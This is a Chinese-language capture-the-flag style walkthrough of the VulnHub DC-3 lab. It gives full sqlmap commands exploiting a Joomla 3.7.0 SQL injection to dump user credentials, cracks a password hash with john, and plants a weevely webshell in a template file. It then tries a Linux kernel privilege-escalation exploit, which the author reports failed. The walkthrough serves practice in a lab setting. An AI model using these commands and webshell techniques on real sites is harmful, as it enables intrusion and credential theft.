地址:
https://download.vulnhub.com/dc/DC-3-2.zip
开启NAT模式
namp只扫到了一个端口

打开网页有一个登录的页面
目录扫描一下,可以找到一个 后台登录界面

看一下指纹信息

joomla cms
网上搜一下可以发现存在一个JoomScan工具
在kali上面安装一下
apt install joomscan

joomscan -u 扫一下, 发现它的版本为3.7.0

网上搜一下, 发现存在sql注入的漏洞

利用kali上面的工具
searchsploit joomla 3.7

找到这个漏洞文件, 照着sqlmap打, 换一下host

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

查表

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

查列名

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

查看数据

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到的密码是经过加密的, 用john爆破一下
将$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
放到1.txt中, 然后爆破
jonh 1.txt 得到密码: snoopy

用之前扫到的后台路径, 可以登录进去

再模板里面可以新建文件, 可以上传文件, 也可以直接更改文件的代码
使用weevely生成一个木马
https://blog.csdn.net/qq_45521281/article/details/106587791

将木马插入到index.php里面去

使用weevely进行连接weevely "http://192.168.75.135/index.php?tp=1&templateStyle=4" 1

其实也可以直接新建一个比如 1.php
然后写上一句话马, 或者反弹shell啥的,
访问到这个目录 /templates/beez3/1.php也就能够连上了
(我就是不知道如何找到这个目录的,有点懵)
连上去后, 权限比较低, 需要提权

看看是否有suid提权
find / -user root -perm -4000 -print 2>/dev/null
但是没找到可以用的

uname -a 看看系统信息, 看看内核版本看看系统版本 cat /etc/*-release

找找这个版本是否存在一些漏洞

searchsploit ubuntu 16.04
看到39772.txt
访问相应的url, 下载到shell上面(一个39772.zip文件)

unzip 39772.zip   #解压
cd 39772
tar -xvf exploit.tar   # 解压

前面的文件下载那里是给了使用的教程的

cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

不知道为啥, 好像没有用

拿蚁剑连了一下, 重新上传了一下zip文件也是一样的, 不知道为啥

我看别人也是这个一样的回显啊, 咋别人就成root了, 我这就不行呢?

参考文章:
https://www.cnblogs.com/1-Ry/p/15075074.html
https://www.cnblogs.com/shadowink/p/14730761.html